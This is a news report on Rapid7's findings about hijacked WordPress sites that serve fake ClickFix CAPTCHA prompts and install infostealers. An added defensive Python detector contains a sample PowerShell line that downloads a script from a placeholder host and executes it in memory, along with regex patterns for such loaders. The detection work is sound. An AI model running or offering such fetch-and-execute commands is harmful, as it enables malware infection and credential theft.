Hackers hijack Wordpress sites and deploy CAPTCHA ClickFix in global infostealer campaign


Cybercriminals have compromised hundreds of websites – including regional news outlets and the website of a US Senate candidate – in a global malware operation, new research has uncovered.

Instead of building malicious websites from scratch, attackers are now hijacking trusted sites built on WordPress and turning them into malware delivery platforms, according to researchers at Rapid7.

The security firm says that the campaign has already affected more than 250 compromised websites across 12 countries, including the UK, US, Germany, Australia, Canada, Brazil, India, Slovakia and Switzerland.


In its report, Rapid7 did not specify which initial vulnerabilities were used to break into the WordPress sites. Common entry points include social engineering, plugin flaws and attacks on outdated installations, but the report's author, Milan Špinka, told Cybernews that at least some of the affected websites run the latest WordPress version, and that no single plugin or theme is shared by all of the sites.

"The most likely scenario we are considering is that the attackers are not exploiting a WordPress-related vulnerability at all, but rather they are using valid credentials to hijack website administrator accounts by simply logging into publicly exposed admin panels."

Milan Špinka, security researcher, Rapid7.

Once a site is under their control, the firm reports, visitors are presented with what appears to be a Cloudflare verification CAPTCHA.

Instead of asking visitors to prove they are human, this fake ‘ClickFix’ prompt instructs them to copy and run a command on their computer, tricking them into executing a malicious PowerShell command that begins the infection process.

Once executed, the command downloads additional scripts from attacker-controlled servers.

In a detailed blog post, Špinka outlines how these scripts use Windows APIs including ‘VirtualAlloc’ and ‘CreateThread’ to load malicious code directly into memory. By running in memory rather than writing files to disk, the malware can evade some security detection tools.
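As an added illustration (not code from Rapid7's report or from the campaign), the following Python triages PowerShell script-block log lines for the two stages the article describes: a remotely fetched script executed without touching disk, and a VirtualAlloc/CreateThread in-memory loader. The sample log lines, the indicator names and the `[Win32]` type name are constructed assumptions for this example.

```python
import re
from typing import Dict, List

# Constructed PowerShell script-block log entries, in the shape Windows
# records as Event ID 4104 when script block logging is enabled. These are
# illustrative samples written for this example, not captures from the campaign.
SAMPLE_SCRIPT_BLOCKS = [
    # Benign administrative script: should not be flagged.
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Sort-Object LastWriteTime",
    # Stage-1 shape from the article: fetch a second stage from a remote host
    # and execute it directly, without writing a file.
    "$s=(New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt'); IEX $s",
    # Stage-2 shape from the article: reserve memory and start a thread in it.
    # [Win32] is an assumed, example-only type name; arguments are elided.
    "$m=[Win32]::VirtualAlloc(...); [Win32]::CreateThread(...)",
]

# Each indicator maps a name to a pattern; matching is case-insensitive
# because PowerShell itself is.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "remote_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.I),
    "dynamic_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "memory_alloc": re.compile(r"\bVirtualAlloc(Ex)?\b", re.I),
    "thread_start": re.compile(r"\bCreateThread\b", re.I),
}

def classify_script_block(block: str) -> Dict[str, object]:
    """Return the indicators a script block matches and a coarse verdict."""
    hits = [name for name, pat in INDICATORS.items() if pat.search(block)]
    # The article describes two stages; each pair below captures one of them.
    in_memory_loader = {"memory_alloc", "thread_start"} <= set(hits)
    fetch_and_run = {"remote_fetch", "dynamic_exec"} <= set(hits)
    if in_memory_loader:
        verdict = "high"
    elif fetch_and_run:
        verdict = "medium"
    elif hits:
        verdict = "low"
    else:
        verdict = "none"
    return {"hits": hits, "verdict": verdict}

def triage(blocks: List[str]) -> List[str]:
    """Verdict per block, in input order."""
    return [str(classify_script_block(b)["verdict"]) for b in blocks]

if __name__ == "__main__":
    for block, verdict in zip(SAMPLE_SCRIPT_BLOCKS, triage(SAMPLE_SCRIPT_BLOCKS)):
        print(f"{verdict:6s} {block[:70]}")
```

A single indicator alone (for example an Invoke-WebRequest in an update script) is common in legitimate administration, which is why only the paired patterns raise the verdict.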


The attack ultimately installs infostealing malware, including an updated version of Vidar stealer, a .NET-based malware the security company names “Impure stealer”, and a newly observed infostealer dubbed “VodkaStealer”, which Rapid7 speculates may have been developed via vibe coding.

Once installed, these infostealers search infected systems for sensitive information such as browser-stored credentials, authentication cookies, and cryptocurrency wallet information.

Rapid7 has chosen not to identify any of the affected companies – which include regional media outlets, local businesses and "in one case even a United States Senate candidate's official webpage."

The company adds that it has notified the US authorities of the latter incident.

Evidence suggests that the campaign has been active since December, although parts of the attack infrastructure date back to mid-2025, indicating that the campaign may have been carefully prepared before being deployed at scale.
